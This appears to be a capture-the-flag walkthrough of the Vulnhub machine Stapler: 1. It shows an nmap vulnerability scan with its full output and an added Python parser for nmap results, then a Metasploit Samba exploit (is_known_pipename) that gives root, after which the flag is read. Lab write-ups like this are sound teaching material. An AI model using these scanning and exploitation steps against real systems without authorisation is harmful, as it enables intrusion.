Stapler: 1 Vulnhub Machine Walkthrough

Let's find the target's IP first by scanning the local subnet with nmap.

nmap 192.168.18.0/24

The IP is 192.168.18.85.

Let's run a more thorough scan to enumerate services and versions (-sV, -O, -A) and add nmap's basic vulnerability scripts (--script vuln).

root@kali:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).

Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp   open   domain      dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:thekelleys:dnsmasq:2.75: 
|       CVE-2019-14513  5.0     https://vulners.com/cve/CVE-2019-14513
|_      CVE-2019-14834  4.3     https://vulners.com/cve/CVE-2019-14834
80/tcp   open   http        PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp  open   doom?
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.18.85

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds
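Reading a long --script vuln report by eye is error-prone, so here is an added example (not part of the original walkthrough) that parses nmap's normal output into structured port records and separates real script findings from noise such as the repeated clamav-exec errors. The sample text is a constructed, trimmed copy of the scan above, the parser works on any nmap normal-output port table rather than only this one, and the list of "noise" script ids is an assumption.

```python
import re
# Constructed sample: a trimmed copy of the nmap normal output from the scan above.
SAMPLE_SCAN = """\
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp   open   domain      dnsmasq 2.75
| vulners:
|_      CVE-2019-14834  4.3     https://vulners.com/cve/CVE-2019-14834
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp  open   doom?
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
"""
# Port row: "21/tcp   open   ftp   vsftpd ..." -> port, proto, state, service, optional version.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# Script header: "| id: text" or "|_id: text"; deeper-indented "|   ..." lines are continuations.
SCRIPT_HEAD = re.compile(r"^\|_? ?(\S+?):(?:\s+(.*))?$")

def parse_nmap(text):
    """Parse nmap normal output into port records, each with its NSE script output attached."""
    ports, current, script_id = [], None, None
    for raw in text.splitlines():
        m = PORT_LINE.match(line := raw.rstrip())
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                       "service": m.group(4), "version": m.group(5) or "", "scripts": {}}
            ports.append(current)
            script_id = None
        elif current is not None and line.startswith("|"):
            head = SCRIPT_HEAD.match(line)
            if head:
                script_id = head.group(1)
                current["scripts"][script_id] = [head.group(2)] if head.group(2) else []
            elif script_id is not None:  # continuation line of the current script
                current["scripts"][script_id].append(line.lstrip("|_ "))
    return ports

def open_services(ports):  # (port, service, version) for every open port: the exposure inventory
    return [(p["port"], p["service"], p["version"]) for p in ports if p["state"] == "open"]

def script_findings(ports, ignore=("clamav-exec",)):
    """Script output per port, dropping empty results and ids listed as known noise (assumed list)."""
    out = {}
    for p in ports:
        for sid, lines in p["scripts"].items():
            if lines and sid not in ignore:
                out.setdefault(p["port"], {})[sid] = lines
    return out
```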

I didn't find anything interesting on the port 80 web page, nor in the nikto and gobuster scans.

Samba is running on port 139. Let's try to exploit it before moving on to FTP.

msfconsole
msf5 > use exploit/linux/samba/is_known_pipename

Now set the module options.

Time to run the exploit: enter run.

We got root. Now let's read the flag.

cat /root/flag.txt

Finished! That's all for today.